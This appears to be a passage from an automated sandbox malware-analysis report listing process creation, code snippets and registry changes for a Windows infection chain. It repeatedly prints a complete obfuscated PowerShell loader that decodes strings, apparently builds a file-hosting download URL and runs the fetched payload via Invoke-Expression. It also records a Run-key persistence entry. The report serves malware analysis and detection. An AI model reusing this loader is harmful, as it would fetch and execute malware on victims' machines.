Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaMod
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077BCAF8 pushad ; retf 6_2_077BD369
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219709AD push ecx; mov dword ptr [esp], ecx10_2_219709B6
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A553A2 push ebx; iretd 11_2_03A553A3
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5F304 push 00000023h; iretd 11_2_03A5F306
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5630A push ebx; ret 11_2_03A5632C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5F205 pushfd ; retf 11_2_03A5F21A
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A681AD push esp; retf 11_2_03A681AF
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A6388F push F39966E4h; ret 11_2_03A638B4
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A666B9 push edx; retf 11_2_03A666BA
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A54624 push ecx; ret 11_2_03A54629
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5AE22 push ebp; iretd 11_2_03A5AE23
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A555C2 push es; ret 11_2_03A555C3
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E009AD push ecx; mov dword ptr [esp], ecx12_2_02E009B6
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A705B push esp; retf 12_2_003A705D
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039E0B3 pushfd ; retf 12_2_0039E0C8
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003951B8 push ebx; ret 12_2_003951DA
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039E1B2 push 00000023h; iretd 12_2_0039E1B4
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003934D2 push ecx; ret 12_2_003934D7
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A5567 push edx; retf 12_2_003A5568
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A58E2 push ebp; iretd 12_2_003A5935
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A5938 push ebp; iretd 12_2_003A5935
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003B0E55 push EFE54BE9h; ret 12_2_003B0E5A
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2B688 push esp; iretd 12_2_02C2B68E
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2485E push ecx; ret 12_2_02C24847
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2681F push ss; retf 12_2_02C26829
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C24838 push ecx; ret 12_2_02C24847
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C26939 push esi; retf 12_2_02C2693A
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C29F0C push edx; iretd 12_2_02C29F11
          Source: C:\Windows\SysWOW64\ktmutil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KB60QNXX7JNJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KB60QNXX7JNJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
